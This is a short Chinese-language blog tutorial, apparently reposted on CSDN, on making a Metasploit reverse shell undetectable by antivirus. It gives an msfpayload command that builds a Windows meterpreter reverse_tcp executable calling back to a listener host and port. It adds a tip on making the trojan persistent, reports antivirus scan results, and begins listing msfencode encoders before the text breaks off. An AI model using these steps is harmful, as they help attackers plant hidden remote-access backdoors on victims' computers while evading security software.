Metasploit reverse Shell的免杀(炊少教学)
作者:互联网
rootkithat是我以前的马甲 以前写的文章
我们先生成一个X64的WINDOWS XP 的reverse SHELL
1 2 |
root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/ meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe |
提示:你可以用 scheduleme -m 1 -u e /tmp/x64.exe 让你的木马更持久
提交到世界杀毒网
——————————————
8%的杀软(3/37)报告发现病毒,我们来加密他,让他到达免杀的效果
查看metasploit自带的加密模块
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
root@rootkithat:/opt/framework-3.7.1/msf3# ./msfencode -l Framework Encoders================== Name Rank Description ---- ---- ----------- cmd/generic_sh good Generic Shell Variable Substitution Command Encoder cmd/ifs low Generic ${IFS} Substitution Command Encoder cmd/printf_php_mq manual printf(1) via PHP m |
标签:Metasploit,Shell,reverse,rootkithat,cmd,Encoder,msf3 来源: https://blog.csdn.net/weiliang369/article/details/123130498